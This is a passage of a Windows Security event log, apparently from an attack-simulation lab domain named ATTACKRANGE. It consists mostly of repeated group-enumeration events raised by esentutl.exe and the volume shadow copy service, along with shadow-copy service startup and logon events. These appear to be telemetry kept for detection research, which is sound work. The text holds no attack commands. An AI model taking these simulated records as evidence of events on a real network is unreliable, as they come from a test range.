	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257953
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257952
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257951
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257950
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257949
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257948
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257947
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257946
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257945
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257944
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257943
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257942
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257941
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257940
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257939
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257938
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257937
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257936
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257935
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257934
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257933
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257932
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257931
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257930
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257929
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257928
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257927
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257926
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257925
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257924
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257923
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257922
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257921
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257920
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257919
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257918
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257917
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257916
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xa10
	New Process Name:	C:\Windows\System32\svchost.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x350
	Creator Process Name:	C:\Windows\System32\services.exe
	Process Command Line:	C:\Windows\System32\svchost.exe -k swprv

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=257915
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		SYSTEM
	Account Domain:		NT AUTHORITY
	Logon ID:		0x3E7

Privileges:		SeAssignPrimaryTokenPrivilege
			SeTcbPrivilege
			SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeAuditPrivilege
			SeSystemEnvironmentPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=257914
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Logon Information:
	Logon Type:		5
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		SYSTEM
	Account Domain:		NT AUTHORITY
	Logon ID:		0x3E7
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x350
	Process Name:		C:\Windows\System32\services.exe

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258044
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258043
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258042
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=258041
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
